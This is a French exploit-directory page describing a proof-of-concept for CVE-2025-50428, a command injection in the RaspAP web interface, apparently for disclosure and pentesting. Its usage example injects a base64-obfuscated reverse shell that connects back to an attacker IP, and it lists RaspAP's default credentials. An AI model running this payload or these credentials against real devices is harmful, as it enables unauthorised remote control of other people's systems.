Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-50428 — Preuve de concept pour la vulnérabilité CVE-2025-50428 : Injection de commandes OS authentifiée dans RaspAP | Kitploit
Outils/GitHubGitHub/security-smarttecs/cve-2025-50428
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubsecurity-smarttecs/cve-2025-50428

cve-2025-50428

Preuve de concept pour la vulnérabilité CVE-2025-50428 : Injection de commandes OS authentifiée dans RaspAP

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE Severity Product Version

CVE-2025-50428 - Injection de commandes RaspAP

Un exploit de type preuve de concept pour CVE-2025-50428, une vulnérabilité d'injection de commandes dans RaspAP raspap-webgui 3.2.9 et versions antérieures.


Identifiant de vulnérabilitéCVE-2025-50428
GravitéÉlevée (CVSS 3.1 : 8.6)
Vecteur CVSSCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Type de vulnérabilitéInjection de code
Vecteur d'attaqueÀ distance (authentifié)
Privilèges requisFaibles
ImpactExécution de code, élévation de privilèges
Produit concernéraspap-webgui ≤ 3.2.9
Découvert parSmartTECS Cyber Security GmbH

Description

Cet exploit cible une vulnérabilité d'injection de commandes dans le script hostapd.php de RaspAP. La vulnérabilité existe en raison d'un assainissement inadéquat des entrées utilisateur transmises via le paramètre interface. Un attaquant authentifié peut injecter des commandes OS arbitraires, ce qui permet une exécution de code avec les privilèges de l'utilisateur www-data.

Versions vulnérables

  • raspap-webgui ≤ 3.2.9

Prérequis

  • Python 3.x
  • Bibliothèque requests installée
  • Cible exécutant une version vulnérable de RaspAP
  • Identifiants de connexion RaspAP valides

Utilisation

root@kitploit:~
python3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]

Paramètres

  • --base-url : URL de base de l'installation RaspAP (par ex., http://192.168.122.22)
  • --interface : Valeur du paramètre interface, charge utile d'injection autorisée
  • --username : Nom d'utilisateur RaspAP (par défaut : admin)
  • --password : Mot de passe RaspAP (par défaut : secret)

Exemple

root@kitploit:~
python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"

Fonctionnement

  1. Le script s'authentifie auprès de l'interface web RaspAP à l'aide des identifiants fournis.
  2. Il récupère un jeton CSRF valide depuis le serveur.
  3. Une requête POST est envoyée à hostapd.php avec le paramètre interface contenant une charge utile d'injection de commandes malveillante.
  4. Les commandes injectées s'exécutent sur le système cible avec les privilèges www-data.

Remarques

  • L'exploit nécessite des identifiants valides.
  • Une exploitation réussie permet l'exécution de commandes arbitraires, qui peut être enchaînée pour une élévation de privilèges.

SmartTECS Cyber Security GmbH

SmartTECS Cyber Security GmbH est une entreprise de cybersécurité spécialisée dans les tests d'intrusion, le développement logiciel sécurisé et la recherche de vulnérabilités. L'entreprise fournit des évaluations de sécurité sur mesure, des services de réponse aux incidents et des services de conseil stratégique pour aider les organisations à protéger leurs systèmes critiques contre les cybermenaces en évolution.

Avertissement

Cet outil est fourni strictement à des fins éducatives et de recherche. Ne l'utilisez que sur des systèmes dont vous êtes propriétaire ou que vous administrez avec une autorisation explicite. L'auteur et SmartTECS Cyber Security GmbH déclinent toute responsabilité en cas d'utilisation abusive ou de dommages.

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2025-50428
Télécharger l’outil